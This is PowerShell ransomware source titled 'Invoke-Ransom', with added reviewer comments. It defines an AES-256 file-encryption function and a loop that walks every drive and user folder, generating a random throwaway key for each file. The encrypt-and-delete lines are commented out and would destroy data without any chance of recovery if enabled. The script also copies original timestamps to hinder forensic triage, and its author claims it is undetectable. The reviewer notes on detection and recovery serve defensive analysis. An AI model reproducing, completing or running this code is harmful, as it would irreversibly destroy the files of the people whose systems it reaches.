#################################
####    PROOF OF CONCEPT     ####
####  PRICE-PER-KEY RANSOM   ####
#################################

<#
.Synopsis
    This script will encrypt every file with its own encryption key on a user's computer, based on
    that user's permissions. If run by System then some main System files will be encrypted also.
    Important files will not be touched so the OS can still function. Will NOT run on PowerShell 5.
.NOTES
    Name: Invoke-Ransom
    Author: Elder4Ever
    Version: 1.0
    DateCreated: 2022-08-30
    Detection: Undetectable (as of 2022-08-30)
    Powershell Version: 7.0 or Higher
.LINK
    No Link Yet
#>

# NOTE(review): "Undetectable" is the author's claim as of the stated date; nothing on this page
# verifies it. The behaviour below is observable independently of signature coverage: one PowerShell
# process recursively enumerating many drive roots, reading whole files, writing siblings with a
# ".K9" extension, and (if the commented-out lines at the bottom are enabled) deleting the originals.
# PowerShell script block logging would record this function definition and the driver loop.

# Invoke-AESEncryption: AES-256-CBC helper with two parameter sets, a string ($Text) or a file ($Path).
#   -Mode  'Encrypt' or 'Decrypt'
#   -Key   passphrase; the AES key is the SHA-256 hash of its UTF-8 bytes (no salt, no iteration)
#   -Text  string to encrypt, or Base64 ciphertext to decrypt
#   -Path  file to encrypt (output: "<path>.K9") or decrypt (output: path with ".K9" removed)
# Returns the Base64 ciphertext / plaintext string for -Text, or a status message for -Path.
# On-disk format: 16-byte IV followed by the CBC ciphertext. There is no integrity tag or header,
# so a ".K9" file carries no marker other than its extension.
function Invoke-AESEncryption {
    [CmdletBinding()]
    [OutputType([string])]
    Param
    (
        [Parameter(Mandatory = $true)]
        [ValidateSet('Encrypt', 'Decrypt')]
        [String]$Mode,

        [Parameter(Mandatory = $true)]
        [String]$Key,

        [Parameter(Mandatory = $true, ParameterSetName = "CryptText")]
        [String]$Text,

        [Parameter(Mandatory = $true, ParameterSetName = "CryptFile")]
        [String]$Path
    )

    Begin {
        $shaManaged = New-Object System.Security.Cryptography.SHA256Managed
        $aesManaged = New-Object System.Security.Cryptography.AesManaged
        $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
        # Zero padding is not self-describing: the padded length cannot be told apart from
        # plaintext that genuinely ends in zero bytes.
        $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
        $aesManaged.BlockSize = 128
        $aesManaged.KeySize = 256
    }

    Process {
        # Key = SHA-256(UTF-8 passphrase); the IV is whatever AesManaged generated for this object.
        $aesManaged.Key = $shaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key))

        switch ($Mode) {
            'Encrypt' {
                if ($Text) {$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($Text)}

                if ($Path) {
                    $File = Get-Item -Path $Path -ErrorAction SilentlyContinue
                    if (!$File.FullName) {
                        Write-Error -Message "File not found!"
                        break
                    }
                    # The whole file is read into memory; output goes next to the original.
                    $plainBytes = [System.IO.File]::ReadAllBytes($File.FullName)
                    $outPath = $File.FullName + ".K9"
                }

                $encryptor = $aesManaged.CreateEncryptor()
                $encryptedBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length)
                # Prepend the IV so the first 16 bytes of the output are the IV.
                $encryptedBytes = $aesManaged.IV + $encryptedBytes
                $aesManaged.Dispose()

                if ($Text) {return [System.Convert]::ToBase64String($encryptedBytes)}

                if ($Path) {
                    [System.IO.File]::WriteAllBytes($outPath, $encryptedBytes)
                    # The original's LastWriteTime is copied onto the new file, so triage that keys
                    # on modification time will not show ".K9" files as recently written. Only
                    # LastWriteTime is set here; other timestamps are left as the file system made them.
                    (Get-Item $outPath).LastWriteTime = $File.LastWriteTime
                    return "File encrypted to $outPath"
                }
            }

            'Decrypt' {
                if ($Text) {$cipherBytes = [System.Convert]::FromBase64String($Text)}

                if ($Path) {
                    $File = Get-Item -Path $Path -ErrorAction SilentlyContinue
                    if (!$File.FullName) {
                        Write-Error -Message "File not found!"
                        break
                    }
                    $cipherBytes = [System.IO.File]::ReadAllBytes($File.FullName)
                    # NOTE(review): -replace takes a regex, so ".K9" here matches any character
                    # followed by "K9", anywhere in the path, not only the trailing extension.
                    $outPath = $File.FullName -replace ".K9"
                }

                # First 16 bytes are the IV written by the Encrypt branch; the rest is ciphertext.
                $aesManaged.IV = $cipherBytes[0..15]
                $decryptor = $aesManaged.CreateDecryptor()
                $decryptedBytes = $decryptor.TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16)
                $aesManaged.Dispose()

                # Text output has trailing NUL characters trimmed ...
                if ($Text) {return [System.Text.Encoding]::UTF8.GetString($decryptedBytes).Trim([char]0)}

                if ($Path) {
                    # ... but file output is written as-is. Recovery caveat: a restored file can
                    # carry trailing zero bytes up to the 16-byte block boundary, so its hash
                    # need not match the original even with the right key.
                    [System.IO.File]::WriteAllBytes($outPath, $decryptedBytes)
                    (Get-Item $outPath).LastWriteTime = $File.LastWriteTime
                    return "File decrypted to $outPath"
                }
            }
        }
    }

    End {
        $shaManaged.Dispose()
        $aesManaged.Dispose()
    }
}

# Driver loop. Scope of the walk: every drive letter root except C:, plus three C: subtrees
# (Users, Program Files, Program Files (x86)). C:\Windows and the bare C:\ root are not in the list.
$Alphabet = "A:\","B:\","C:\Users\","C:\Program Files\","C:\Program Files (x86)\","D:\","E:\","F:\","G:\","H:\","I:\","J:\","K:\","L:\","M:\","N:\","O:\","P:\","Q:\","R:\","S:\","T:\","U:\","V:\","W:\","X:\","Y:\","Z:\"
foreach($A in $Alphabet){
    # -Force includes hidden and system items; SilentlyContinue hides access-denied and
    # missing-drive errors, so the walk produces no error output for roots it cannot read.
    $File = Get-ChildItem "${A}" -Force -Recurse -ErrorAction SilentlyContinue
    foreach($F in $File){
        # Skip directories and anything already carrying the ".K9" extension.
        IF((Get-Item $F) -isnot [System.IO.DirectoryInfo]){
            if($F.Extension -ne ".K9"){
                # Per-file passphrase: 15 independent picks from a 48-character set
                # (a-z, 0-9 and 12 symbols).
                $Char1 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_'
                $Char2 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_'
                $Char3 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_'
                $Char4 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_'
                $Char5 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_'
                $Char6 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_'
                $Char7 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_'
                $Char8 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_'
                $Char9 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_'
                $Char10 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_'
                $Char11 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_'
                $Char12 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_'
                $Char13 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_'
                $Char14 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_'
                $Char15 = Get-Random -InputObject 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','!','@','#','$','%','^','&','*','(',')','-','_'
                $Pass = "$Char1$Char2$Char3$Char4$Char5$Char6$Char7$Char8$Char9$Char10$Char11$Char12$Char13$Char14$Char15"

                # NOTE(review): $Pass exists only in this variable and is overwritten on the next
                # iteration. Nothing visible here stores or transmits it; the only reference is the
                # commented-out Write-Host below. As published, the loop therefore only enumerates
                # files and generates passphrases. With the two commented-out lines enabled, the
                # result would be destructive rather than recoverable: no key exists to hand back,
                # so recovery would depend on backups, not on decryption. The original would be
                # removed with a plain delete (no overwrite), so existing backups and snapshots
                # are the first place to look during recovery.

                #Write-Host $F.FullName" - $Pass"
                #######DONT UNCOMMENT BELOW UNLESS YOU WANT TO DESTROY SOMEONES DAY#######
                #Invoke-AESEncryption -Mode Encrypt -Key "$Pass" -Path $F
                #Remove-Item $F.FullName -Recurse -Force
            }
        }
    }
}